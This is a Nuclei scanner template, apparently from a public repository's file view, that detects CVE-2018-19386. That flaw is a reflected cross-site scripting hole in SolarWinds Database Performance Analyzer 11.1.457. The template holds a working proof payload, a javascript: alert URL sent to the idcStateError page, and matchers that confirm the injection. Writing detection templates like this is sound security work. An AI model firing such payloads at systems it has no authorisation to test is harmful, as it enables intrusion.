nuclei-templates/cves/2018/CVE-2018-19386.yaml

30 lines
980 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-19386
2020-09-09 01:45:42 +00:00
info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button
on the page, aka a /iwc/idcStateError.iwc?page= URI.
reference:
- https://www.cvedetails.com/cve/CVE-2018-19386/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-19386
cwe-id: CWE-79
tags: cve,cve2018,solarwinds,xss
2020-09-09 01:45:42 +00:00
requests:
- method: GET
path:
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2020-10-15 18:50:10 +00:00
- '<a href="javascript:alert(document.domain)//'